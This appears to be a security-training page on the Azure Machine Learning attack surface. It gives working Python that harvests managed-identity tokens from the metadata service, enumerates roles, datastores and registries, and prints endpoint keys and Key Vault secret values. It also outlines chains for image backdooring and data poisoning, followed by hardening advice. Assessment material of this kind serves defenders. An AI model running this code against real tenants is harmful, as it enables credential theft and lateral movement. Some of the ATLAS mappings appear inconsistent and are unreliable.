Azure ML Attack Surface
Security assessment of Azure Machine Learning: managed identity exploitation, workspace security, compute instance attacks, and endpoint vulnerabilities.
Azure ML Architecture
Azure Machine Learning organizes resources around workspaces. Each workspace connects to Azure storage, Key Vault, Container Registry, and Application Insights.
Attack Surface Map
| Component | Identity | Storage | Network Exposure |
|---|---|---|---|
| Compute Instances | Managed Identity/User | Workspace storage | VNet optional |
| Online Endpoints | Managed Identity | Model in ACR/Blob | Internet-facing |
| Batch Endpoints | Managed Identity | Blob input/output | VNet optional |
| Datastores | Workspace MI | Blob/ADLS/SQL | Workspace VNet |
| Pipelines | Pipeline MI | Blob artifacts | Workspace VNet |
Attack Techniques
1. Managed Identity Exploitation
Azure ML compute instances are assigned managed identities (system-assigned or user-assigned) that authenticate to Azure services without storing credentials. When these identities are overprivileged -- a common misconfiguration since ML workflows touch many services -- compromising a compute instance grants broad access across the Azure subscription.
The Instance Metadata Service (IMDS) at 169.254.169.254 is the primary token source. Unlike AWS IMDSv2, Azure IMDS does not require a PUT-based session token exchange: a single GET request carrying the Metadata: true header is enough, so any code running on the instance can harvest credentials.
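The access token handed back for a managed identity is a JSON Web Token, so its payload can be read without any key. The sketch below decodes the claims to show which audience and principal a harvested token represents. It does not verify the signature, and the claim names picked out (aud, tid, oid, appid, exp) are assumptions based on typical Azure AD v1 access tokens; the helper names are hypothetical.

```python
import base64
import json


def decode_jwt_claims(token: str) -> dict:
    """Return the payload claims of a JWT without verifying its signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected a three-part JWT (header.payload.signature)")
    payload = parts[1]
    # JWT segments are unpadded base64url; restore the padding before decoding.
    payload += "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def summarize_identity(claims: dict) -> dict:
    """Pick out the claims most useful for scoping follow-up enumeration."""
    return {
        "audience": claims.get("aud"),       # which API the token is valid for
        "tenant_id": claims.get("tid"),
        "principal_id": claims.get("oid"),   # object ID to match in role assignments
        "client_id": claims.get("appid"),
        "expires_at": claims.get("exp"),     # Unix timestamp
    }
```

The principal ID is the value to look for when reading role assignments, and the expiry indicates how long a copied token stays usable off the instance.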
import requests

# From inside an Azure ML compute instance:
# request a token for the managed identity from IMDS
token_url = "http://169.254.169.254/metadata/identity/oauth2/token"
params = {
    "api-version": "2018-02-01",
    "resource": "https://management.azure.com/",
}
headers = {"Metadata": "true"}
resp = requests.get(token_url, params=params, headers=headers, timeout=10)
resp.raise_for_status()
token = resp.json()["access_token"]

# Use the token to enumerate the subscriptions visible to the identity
mgmt_url = "https://management.azure.com/subscriptions?api-version=2020-01-01"
subs = requests.get(
    mgmt_url, headers={"Authorization": f"Bearer {token}"}, timeout=10
).json()
for sub in subs.get("value", []):
    print(f"Subscription: {sub['displayName']} ({sub['subscriptionId']})")

Lateral Movement via Managed Identity
Once you have a token, enumerate what the managed identity can reach. Common overprivilege patterns include Contributor-level access to the resource group (granting access to all sibling resources), Storage Blob Data Contributor on storage accounts containing non-ML data, and Key Vault Secrets Officer across multiple vaults.
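The overprivilege patterns just listed can be checked mechanically once role assignments are in hand. The following is a minimal sketch that assumes records shaped like the Azure Resource Manager roleAssignments response (a properties object with roleDefinitionId, scope, and principalId). The role GUIDs are taken from Azure's built-in role list as best recalled and should be verified before use; the function names are hypothetical.

```python
# Built-in role definition GUIDs (assumption: verify against the current
# Azure built-in roles documentation before relying on them).
BROAD_ROLES = {
    "8e3af657-a8ff-443c-a75c-2fe8c4bcb635": "Owner",
    "b24988ac-6180-42a0-ab88-20f7d0dd260c": "Contributor",
    "ba92f5b4-2d11-453d-a403-e96b0029c9fe": "Storage Blob Data Contributor",
    "b86a8fe4-44ce-4948-aee5-eccb2c155cd7": "Key Vault Secrets Officer",
}


def scope_level(scope: str) -> str:
    """Classify an ARM scope string by how much of the hierarchy it covers."""
    parts = [p.lower() for p in scope.strip("/").split("/") if p]
    if not parts:
        return "root"
    if len(parts) == 2 and parts[0] == "subscriptions":
        return "subscription"
    if len(parts) == 4 and parts[0] == "subscriptions" and parts[2] == "resourcegroups":
        return "resource_group"
    if len(parts) == 4 and parts[:3] == ["providers", "microsoft.management", "managementgroups"]:
        return "management_group"
    return "resource"


def flag_broad_roles(assignments, principal_id=None):
    """Return (role name, scope level, scope) for assignments using a broad role."""
    findings = []
    for assignment in assignments:
        props = assignment.get("properties", {})
        if principal_id and props.get("principalId") != principal_id:
            continue
        # roleDefinitionId ends with the role's GUID.
        role_guid = props.get("roleDefinitionId", "").rsplit("/", 1)[-1].lower()
        role_name = BROAD_ROLES.get(role_guid)
        if role_name:
            scope = props.get("scope", "")
            findings.append((role_name, scope_level(scope), scope))
    return findings
```

A Contributor assignment at resource-group or subscription level is usually the first thing to report; a data-plane role scoped to a single storage account needs a look at what that account actually holds.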
import requests

IMDS_TOKEN_URL = "http://169.254.169.254/metadata/identity/oauth2/token"

def enumerate_role_assignments(token, subscription_id):
    """Enumerate the role assignments readable in a subscription."""
    url = (
        f"https://management.azure.com/subscriptions/{subscription_id}"
        f"/providers/Microsoft.Authorization/roleAssignments"
        f"?api-version=2022-04-01"
    )
    headers = {"Authorization": f"Bearer {token}"}
    resp = requests.get(url, headers=headers, timeout=10).json()
    for assignment in resp.get("value", []):
        props = assignment["properties"]
        # roleDefinitionId ends with the role's GUID
        print(f"Role: {props['roleDefinitionId'].split('/')[-1]}")
        print(f"  Scope: {props['scope']}")
        print(f"  Principal: {props['principalId']}")
        print()

def get_token_for_resource(resource_url):
    """Get a managed identity token scoped to a specific resource."""
    resp = requests.get(
        IMDS_TOKEN_URL,
        params={"api-version": "2018-02-01", "resource": resource_url},
        headers={"Metadata": "true"},
        timeout=10,
    )
    return resp.json()["access_token"]

# Get tokens for different Azure services
mgmt_token = get_token_for_resource("https://management.azure.com/")
storage_token = get_token_for_resource("https://storage.azure.com/")
vault_token = get_token_for_resource("https://vault.azure.net")
graph_token = get_token_for_resource("https://graph.microsoft.com/")

2. Workspace Data Store Enumeration
Azure ML workspaces connect to multiple data stores: Azure Blob Storage, Azure Data Lake Storage (ADLS Gen2), Azure SQL Database, and Azure Database for PostgreSQL. Each datastore registration stores connection details and credentials that can be extracted.
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential

ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="...",
)

# List all datastores
for ds in ml_client.datastores.list():
    print(f"Datastore: {ds.name} (type: {ds.type})")
    if hasattr(ds, "account_name"):
        print(f"  Storage: {ds.account_name}/{ds.container_name}")

# List registered models
for model in ml_client.models.list():
    print(f"Model: {model.name} v{model.version}")

Deep Datastore Inspection
Beyond listing datastores, extract their connection credentials and probe what data is accessible. Datastores that use account keys (rather than managed identity passthrough) store those keys in the workspace's Key Vault.
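The distinction between key-backed and identity-based datastores can be made from the type of the credential object alone. The sketch below sorts credential objects by class name. The class names are assumptions about what the azure-ai-ml SDK exposes for datastore credentials and may differ between SDK versions, so anything unrecognized is reported as unknown rather than guessed.

```python
# Assumed azure-ai-ml credential class names; adjust to the installed SDK.
STORED_SECRET_TYPES = {
    "AccountKeyConfiguration",
    "SasTokenConfiguration",
    "ServicePrincipalConfiguration",
    "CertificateConfiguration",
}
IDENTITY_BASED_TYPES = {"NoneCredentialConfiguration"}


def classify_credential(credential) -> str:
    """Classify a datastore credential object by its class name."""
    name = type(credential).__name__
    if name in STORED_SECRET_TYPES:
        # A secret for this datastore is held on the workspace side.
        return "stored_secret"
    if name in IDENTITY_BASED_TYPES:
        # Access is evaluated against the caller's own identity.
        return "identity_based"
    return "unknown"
```

Datastores classified as stored_secret are the ones whose keys are worth looking for in the workspace Key Vault.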
from itertools import islice

from azure.ai.ml import MLClient
from azure.ai.ml.entities import AzureBlobDatastore
from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobServiceClient

credential = DefaultAzureCredential()
ml_client = MLClient(
    credential,
    subscription_id="...",
    resource_group_name="...",
    workspace_name="...",
)

# Get detailed datastore info including credential type
for ds in ml_client.datastores.list():
    detail = ml_client.datastores.get(ds.name)
    print(f"\nDatastore: {detail.name}")
    print(f"  Type: {detail.type}")
    # Check credential type: account key vs identity-based
    if hasattr(detail, "credentials"):
        cred_type = type(detail.credentials).__name__
        print(f"  Credential type: {cred_type}")
    # For blob datastores, try to list contents
    if isinstance(detail, AzureBlobDatastore):
        blob_client = BlobServiceClient(
            f"https://{detail.account_name}.blob.core.windows.net",
            credential=credential,
        )
        container = blob_client.get_container_client(detail.container_name)
        print("  Sample contents:")
        # islice stops after five blobs; results_per_page only sets the page size
        for blob in islice(container.list_blobs(), 5):
            print(f"    {blob.name} ({blob.size} bytes)")

# Enumerate environments (container images used for training/inference)
for env in ml_client.environments.list():
    print(f"Environment: {env.name} v{env.version}")
    if getattr(env, "image", None):
        print(f"  Image: {env.image}")

# List compute targets: potential pivot points
for compute in ml_client.compute.list():
    # Not every compute type exposes a state attribute
    state = getattr(compute, "state", "unknown")
    print(f"Compute: {compute.name} (type: {compute.type}, state: {state})")

3. Endpoint Authentication Testing
Azure ML online endpoints support key-based authentication (a static API key) and token-based authentication (Azure ML tokens or Azure AD tokens). Misconfigurations include endpoints deployed with authentication disabled, keys that are never rotated, and overly broad CORS policies.
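When probing an endpoint, the HTTP status codes need a consistent reading. The helper below is one possible interpretation, not an official mapping: it assumes a 2xx response to an unauthenticated request means scoring is open, and that 401 or 403 means authentication is enforced. The function name and labels are hypothetical.

```python
from typing import Optional


def classify_auth_probe(unauth_status: int, auth_status: Optional[int] = None) -> str:
    """Interpret status codes from an unauthenticated and an authenticated probe."""
    if 200 <= unauth_status < 300:
        # The endpoint scored a request that carried no credentials.
        return "open"
    if unauth_status not in (401, 403):
        # 404, 5xx and similar say nothing about authentication.
        return "inconclusive"
    if auth_status is None:
        return "auth_enforced"
    if 200 <= auth_status < 300:
        return "credential_accepted"
    if auth_status in (401, 403):
        return "credential_rejected"
    return "inconclusive"
```

For example, classify_auth_probe(401, 200) reports that authentication is enforced and that the supplied key or token was accepted.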
import requests

# Test whether the endpoint requires authentication
endpoint_url = "https://my-endpoint.westus2.inference.ml.azure.com/score"
payload = {"data": [[1, 2, 3]]}

# Attempt unauthenticated access
resp = requests.post(endpoint_url, json=payload, timeout=10)
print(f"No auth: {resp.status_code}")

# Attempt with a stolen/guessed key
resp = requests.post(
    endpoint_url,
    json=payload,
    headers={"Authorization": "Bearer <key>"},
    timeout=10,
)
print(f"With key: {resp.status_code}")

Advanced Endpoint Probing
import requests
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential

def probe_endpoint(endpoint_url, keys=None):
    """Comprehensive endpoint security assessment."""
    results = {}
    # Test authentication modes
    results["no_auth"] = requests.post(
        endpoint_url, json={"data": [[1, 2, 3]]}, timeout=10
    ).status_code
    # Send OPTIONS to check CORS
    results["cors"] = requests.options(endpoint_url, timeout=10).headers.get(
        "Access-Control-Allow-Origin", "not set"
    )
    # Test Swagger/OpenAPI endpoint (often exposed)
    swagger_url = endpoint_url.replace("/score", "/swagger.json")
    swagger_resp = requests.get(swagger_url, timeout=10)
    results["swagger_exposed"] = swagger_resp.status_code == 200
    if results["swagger_exposed"]:
        results["swagger_paths"] = list(swagger_resp.json().get("paths", {}).keys())
    # Test health endpoint
    health_url = endpoint_url.replace("/score", "/")
    results["health"] = requests.get(health_url, timeout=10).status_code
    # Test for verbose error messages (information disclosure)
    headers = {"Content-Type": "application/json"}
    if keys:
        # Only send an Authorization header when a key is available
        headers["Authorization"] = f"Bearer {keys[0]}"
    malformed_resp = requests.post(
        endpoint_url, data="not json", headers=headers, timeout=10
    )
    results["error_verbosity"] = len(malformed_resp.text)
    results["error_sample"] = malformed_resp.text[:500]
    return results

# Enumerate all endpoints and probe each
ml_client = MLClient(
    DefaultAzureCredential(),
    subscription_id="...",
    resource_group_name="...",
    workspace_name="...",
)
for endpoint in ml_client.online_endpoints.list():
    print(f"\n=== Endpoint: {endpoint.name} ===")
    print(f"  Auth mode: {endpoint.auth_mode}")
    print(f"  Scoring URI: {endpoint.scoring_uri}")
    # Get endpoint keys if key-based auth
    if endpoint.auth_mode == "key":
        keys = ml_client.online_endpoints.get_keys(endpoint.name)
        print(f"  Primary key: {keys.primary_key[:10]}...")
        print(f"  Secondary key: {keys.secondary_key[:10]}...")

4. Key Vault Secret Extraction
Every Azure ML workspace creates an associated Azure Key Vault. This vault stores datastore credentials, API keys, custom secrets set by data scientists, and connection strings. The workspace's managed identity typically has broad access to this vault, making it a high-value target after initial compute compromise.
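The vault attached to a workspace does not have to be guessed by name. The workspace resource records the Key Vault's Azure Resource Manager ID, which is assumed here to be available as the keyVault property of the REST response or the key_vault attribute of the SDK's workspace object. A minimal sketch for turning such an ID into a vault URL follows; the function name and the default public-cloud DNS suffix are assumptions.

```python
def vault_url_from_resource_id(resource_id: str, dns_suffix: str = "vault.azure.net") -> str:
    """Build a Key Vault data-plane URL from the vault's ARM resource ID."""
    parts = [p for p in resource_id.strip("/").split("/") if p]
    lowered = [p.lower() for p in parts]
    # Look for the ".../Microsoft.KeyVault/vaults/<name>" segment triple.
    for i in range(len(parts) - 2):
        if lowered[i] == "microsoft.keyvault" and lowered[i + 1] == "vaults":
            return f"https://{parts[i + 2]}.{dns_suffix}/"
    raise ValueError(f"not a Key Vault resource ID: {resource_id!r}")
```

Sovereign clouds use different suffixes, which is why dns_suffix is a parameter rather than a constant.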
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient

# Azure ML workspaces have an associated Key Vault
kv_client = SecretClient(
    vault_url="https://my-workspace-kv.vault.azure.net/",
    credential=DefaultAzureCredential(),
)

# List and read secrets
for secret in kv_client.list_properties_of_secrets():
    print(f"Secret: {secret.name}")
    value = kv_client.get_secret(secret.name)
    print(f"  Value: {value.value[:50]}...")

Comprehensive Key Vault Enumeration
from azure.identity import DefaultAzureCredential
from azure.keyvault.certificates import CertificateClient
from azure.keyvault.keys import KeyClient
from azure.keyvault.secrets import SecretClient

credential = DefaultAzureCredential()
vault_url = "https://my-workspace-kv.vault.azure.net/"

# Enumerate secrets
secret_client = SecretClient(vault_url=vault_url, credential=credential)
print("=== Secrets ===")
for secret in secret_client.list_properties_of_secrets():
    print(f"  {secret.name} (enabled: {secret.enabled}, "
          f"created: {secret.created_on})")
    # Categorize by naming convention
    if any(kw in secret.name.lower() for kw in
           ["connection", "storage", "sql", "password", "key", "token"]):
        print("    [HIGH VALUE] Likely credential or connection string")

# Enumerate keys (used for encryption, signing)
key_client = KeyClient(vault_url=vault_url, credential=credential)
print("\n=== Keys ===")
for key_props in key_client.list_properties_of_keys():
    # Listing returns properties only; fetch the key for its type and operations
    key = key_client.get_key(key_props.name)
    print(f"  {key.name} (type: {key.key_type}, ops: {key.key_operations})")

# Enumerate certificates
cert_client = CertificateClient(vault_url=vault_url, credential=credential)
print("\n=== Certificates ===")
for cert in cert_client.list_properties_of_certificates():
    print(f"  {cert.name} (expires: {cert.expires_on})")

5. Container Registry Exploitation
Azure ML workspaces use Azure Container Registry (ACR) to store Docker images for training and inference environments. Compromising ACR access enables model supply chain attacks, such as replacing legitimate inference images with backdoored versions.
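Image replacement under an unchanged tag shows up as a change in the manifest digest, which a registry implementing the Docker Registry v2 API returns in the Docker-Content-Digest response header. The sketch below compares two snapshots that map "repository:tag" to a digest; how the snapshots are collected is left out, and the function name is hypothetical.

```python
def find_tag_drift(baseline: dict, current: dict) -> dict:
    """Compare two {"repo:tag": "sha256:..."} snapshots of a registry."""
    shared = baseline.keys() & current.keys()
    return {
        # Same tag, different digest: the image behind the tag was replaced.
        "changed": {
            ref: (baseline[ref], current[ref])
            for ref in shared
            if baseline[ref] != current[ref]
        },
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
    }
```

From the attacker's side the same comparison shows which tags are mutable; from the defender's side a non-empty "changed" entry for a production inference image is the signal to investigate.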
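import requests

def get_acr_access_token(acr_url, service, refresh_token, scope):
    """Exchange an ACR refresh token for an access token limited to one scope."""
    resp = requests.post(
        f"{acr_url}/oauth2/token",
        data={
            "grant_type": "refresh_token",
            "service": service,
            "scope": scope,
            "refresh_token": refresh_token,
        },
        timeout=10,
    )
    return resp.json().get("access_token")

def enumerate_acr(acr_name, token):
    """Enumerate repositories and images in Azure Container Registry.

    token is the managed identity's Azure AD access token (assumed here to be
    issued for https://management.azure.com/).
    """
    service = f"{acr_name}.azurecr.io"
    acr_url = f"https://{service}"
    # Exchange the Azure AD token for an ACR refresh token
    exchange_resp = requests.post(
        f"{acr_url}/oauth2/exchange",
        data={"grant_type": "access_token", "service": service, "access_token": token},
        timeout=10,
    )
    refresh_token = exchange_resp.json().get("refresh_token")
    # List repositories (requires a catalog-scoped access token)
    catalog_token = get_acr_access_token(
        acr_url, service, refresh_token, "registry:catalog:*"
    )
    repos = requests.get(
        f"{acr_url}/v2/_catalog",
        headers={"Authorization": f"Bearer {catalog_token}"},
        timeout=10,
    ).json()
    for repo in repos.get("repositories", []):
        print(f"Repository: {repo}")
        # Repository calls require a pull-scoped access token
        repo_token = get_acr_access_token(
            acr_url, service, refresh_token, f"repository:{repo}:pull"
        )
        repo_headers = {"Authorization": f"Bearer {repo_token}"}
        # List tags
        tags = requests.get(
            f"{acr_url}/v2/{repo}/tags/list", headers=repo_headers, timeout=10
        ).json()
        for tag in (tags.get("tags") or [])[:5]:
            print(f"  Tag: {tag}")
            # Get manifest for image analysis
            manifest = requests.get(
                f"{acr_url}/v2/{repo}/manifests/{tag}",
                headers={
                    **repo_headers,
                    "Accept": "application/vnd.docker.distribution.manifest.v2+json",
                },
                timeout=10,
            ).json()
            print(f"    Layers: {len(manifest.get('layers', []))}")

6. Network Isolation Assessment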
Azure ML supports VNet integration, but many deployments use the default configuration without network isolation. Even when VNet integration is enabled, misconfigured network security groups (NSGs) and missing private endpoints create attack paths.
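NSG misconfigurations are usually inbound allow rules whose source is the whole internet. The following sketch scans rules shaped like the securityRules array of an NSG resource in Azure Resource Manager (direction, access, sourceAddressPrefix, destinationPortRange, and their plural variants). It does not evaluate whether a higher-priority deny rule shadows a finding, so results are candidates to review rather than confirmed exposure. The function name is hypothetical.

```python
# Source prefixes treated as "anyone on the internet".
OPEN_SOURCES = {"*", "internet", "0.0.0.0/0", "any"}


def find_open_inbound_rules(security_rules):
    """Return inbound Allow rules whose source is unrestricted, by priority."""
    findings = []
    for rule in security_rules:
        props = rule.get("properties", {})
        if props.get("direction") != "Inbound" or props.get("access") != "Allow":
            continue
        sources = [props.get("sourceAddressPrefix")]
        sources += list(props.get("sourceAddressPrefixes") or [])
        if not any(s and s.lower() in OPEN_SOURCES for s in sources):
            continue
        ports = [props.get("destinationPortRange")]
        ports += list(props.get("destinationPortRanges") or [])
        findings.append({
            "name": rule.get("name"),
            "priority": props.get("priority"),
            "ports": [p for p in ports if p],
        })
    # Lower priority numbers are evaluated first by Azure.
    return sorted(findings, key=lambda f: f["priority"] or 0)
```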
import requests

def assess_network_isolation(token, subscription_id, resource_group, workspace_name):
    """Assess whether an Azure ML workspace has proper network isolation."""
    base_url = "https://management.azure.com"
    headers = {"Authorization": f"Bearer {token}"}
    # Get workspace details
    ws_url = (
        f"{base_url}/subscriptions/{subscription_id}"
        f"/resourceGroups/{resource_group}"
        f"/providers/Microsoft.MachineLearningServices"
        f"/workspaces/{workspace_name}"
        f"?api-version=2023-10-01"
    )
    ws = requests.get(ws_url, headers=headers, timeout=10).json()
    props = ws.get("properties", {})
    results = {
        "public_network_access": props.get("publicNetworkAccess", "Unknown"),
        "private_endpoints": [],
        "managed_network": props.get("managedNetwork", {}),
    }
    # Check for private endpoint connections
    pe_connections = props.get("privateEndpointConnections", [])
    for pe in pe_connections:
        pe_props = pe.get("properties", {})
        results["private_endpoints"].append({
            "name": pe.get("name"),
            "status": pe_props.get("privateLinkServiceConnectionState", {}).get("status"),
        })
    # Assess risk
    if results["public_network_access"] == "Enabled":
        print("[CRITICAL] Public network access is enabled")
    if not results["private_endpoints"]:
        print("[HIGH] No private endpoints configured")
    return results

Defensive Assessment Checklist
When assessing Azure ML security posture, verify these controls:
| Control Area | What to Check | MITRE ATLAS Reference |
|---|---|---|
| Identity | Managed identity scope, conditional access policies, RBAC assignments | AML.T0003 (ML Model Access) |
| Network | VNet integration, private endpoints, NSG rules, public endpoint exposure | AML.T0002 (Active Scanning) |
| Data | Storage encryption, datastore credential type, blob public access | AML.T0008 (Collection) |
| Compute | Instance isolation, SSH access, idle shutdown, patching | AML.T0004 (Full Model Access) |
| Registry | ACR access controls, image signing, vulnerability scanning | AML.T0018 (Backdoor ML Model) |
| Secrets | Key Vault access policies, secret rotation, soft-delete enabled | AML.TA0008 (Collection) |
| Monitoring | Diagnostic settings, Azure Sentinel integration, audit logs | AML.TA0006 (Defense Evasion) |
Recommended Hardening
- Use user-assigned managed identities with least-privilege RBAC instead of system-assigned identities with broad scope.
- Enable VNet integration with private endpoints for the workspace, storage accounts, Key Vault, and ACR.
- Set publicNetworkAccess to Disabled on all workspace resources.
- Use credential passthrough for datastores instead of storing account keys in Key Vault.
- Enable ACR content trust and scan images for vulnerabilities before deployment.
- Enforce auth_mode: aad_token on endpoints rather than key-based authentication.
- Enable Azure Sentinel with the ML workspace diagnostic settings for security monitoring.
- Rotate endpoint keys on a regular schedule and after any suspected compromise.
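Several of these recommendations can be checked from data already gathered during enumeration. The sketch below is illustrative only. It assumes three hypothetical inputs: the workspace properties object from Azure Resource Manager, a mapping of endpoint name to auth mode, and a mapping of datastore name to either "identity" or another label for stored credentials. None of these structures is prescribed by Azure ML.

```python
def audit_hardening(workspace_props: dict,
                    endpoint_auth_modes: dict,
                    datastore_credentials: dict) -> list:
    """Return human-readable findings for unmet hardening recommendations."""
    findings = []
    # A missing value is treated as not hardened.
    if workspace_props.get("publicNetworkAccess", "Enabled") != "Disabled":
        findings.append("workspace: publicNetworkAccess is not Disabled")
    if not workspace_props.get("privateEndpointConnections"):
        findings.append("workspace: no private endpoint connections")
    for name, mode in sorted(endpoint_auth_modes.items()):
        if mode != "aad_token":
            findings.append(f"endpoint {name}: auth_mode is {mode!r}, not 'aad_token'")
    for name, cred in sorted(datastore_credentials.items()):
        if cred != "identity":
            findings.append(f"datastore {name}: uses stored credential ({cred})")
    return findings
```

An empty list means none of the checked recommendations was violated; it says nothing about the items the sketch does not cover, such as image scanning or key rotation.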
Common Attack Chains
Real-world Azure ML engagements typically combine multiple techniques. Here are common attack chains ordered by impact:
Chain 1: Compute to Subscription Takeover
1. Initial access via malicious notebook or compromised data scientist credentials
2. Extract managed identity token from IMDS (169.254.169.254)
3. Enumerate role assignments to discover overprivileged identity
4. Access Key Vault secrets (storage keys, API credentials, connection strings)
5. Use storage keys to access blob containers across the subscription
6. Discover secrets in non-ML Key Vaults shared by the managed identity
7. Pivot to databases, APIs, or other services using extracted credentials
Chain 2: Model Supply Chain Attack
1. Enumerate ACR repositories via workspace managed identity
2. Identify inference container images used by production endpoints
3. Pull the target image, inject a backdoor (data exfiltration layer)
4. Push the modified image with the same tag (no immutability)
5. Trigger endpoint redeployment (or wait for next scheduled update)
6. Backdoored image now exfiltrates inference data to the attacker's C2
Chain 3: Training Pipeline Manipulation
1. Access workspace via compromised compute instance
2. Enumerate datastores and identify training data locations
3. Modify training data in blob storage to inject backdoor examples
4. Wait for scheduled retraining pipeline to execute
5. Backdoored model is registered in model registry
6. Backdoored model is deployed to production endpoint
MITRE ATLAS Mapping for Azure ML Attacks
| Attack Technique | ATLAS ID | Azure ML-Specific Context |
|---|---|---|
| IMDS managed identity token extraction | AML.TA0002 (Initial Access) | Workspace MI with broad RBAC scope |
| Datastore enumeration | AML.T0000 (Search for Victim's Data) | Registered datastores reveal all connected storage |
| Endpoint probing | AML.T0002 (Active Scanning) | Endpoints may use key-based auth without rotation |
| Model extraction via endpoint | AML.T0024 (Model Extraction) | Online endpoints serving model predictions |
| ACR image tampering | AML.T0018 (Backdoor ML Model) | Replace training/inference images in ACR |
| Key Vault lateral movement | AML.TA0008 (Collection) | Workspace Key Vault stores cross-service secrets |
| Training data poisoning via blob | AML.T0020 (Data Poisoning) | Modify training data in connected blob storage |
Cross-Platform Comparison
| Attack Vector | Azure ML | AWS SageMaker | GCP Vertex AI |
|---|---|---|---|
| Credential source | IMDS (managed identity) | IMDS (IAM role) | Metadata server (SA token) |
| Primary storage | Blob Storage / ADLS | S3 | GCS |
| Container registry | Azure Container Registry | Amazon ECR | Artifact Registry |
| Secret management | Key Vault (auto-created) | Secrets Manager / SSM | Secret Manager |
| Network isolation | VNet + Private Endpoints | VPC + VPC Endpoints | VPC-SC + Private Google Access |
| Biggest risk | Key Vault cross-service exposure | IAM role overprivilege | Service account Editor role |
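The credential-source row hides a practical difference in how many requests each platform needs. The table below, expressed as data, is a sketch under stated assumptions: the AWS entry assumes EC2-style IMDSv2 is reachable from the ML compute, which depends on how the SageMaker resource is configured, and the GCP entry assumes the default service account. The dictionary layout and function name are hypothetical.

```python
METADATA_REQUESTS = {
    "azure": {
        "url": "http://169.254.169.254/metadata/identity/oauth2/token",
        "params": {"api-version": "2018-02-01",
                   "resource": "https://management.azure.com/"},
        "headers": {"Metadata": "true"},
        "pre_request": None,
    },
    "aws": {
        # IMDSv2: a PUT first obtains a session token, then a GET lists roles.
        "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "params": {},
        "headers": {"X-aws-ec2-metadata-token": "<session token from pre_request>"},
        "pre_request": {
            "method": "PUT",
            "url": "http://169.254.169.254/latest/api/token",
            "headers": {"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
        },
    },
    "gcp": {
        "url": ("http://metadata.google.internal/computeMetadata/v1/"
                "instance/service-accounts/default/token"),
        "params": {},
        "headers": {"Metadata-Flavor": "Google"},
        "pre_request": None,
    },
}


def requests_needed(platform: str) -> int:
    """Number of HTTP requests before a credential or role listing is returned."""
    spec = METADATA_REQUESTS[platform]
    return 2 if spec["pre_request"] else 1
```

Azure and GCP both gate the metadata service behind a static header only, which is why a single server-side request forgery or one line of notebook code is enough on those platforms.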
Related Topics
- Cloud AI Infrastructure -- Cross-platform overview
- GCP Vertex AI -- GCP comparison
- AWS SageMaker -- AWS comparison
What makes Azure ML's Key Vault integration a significant attack surface?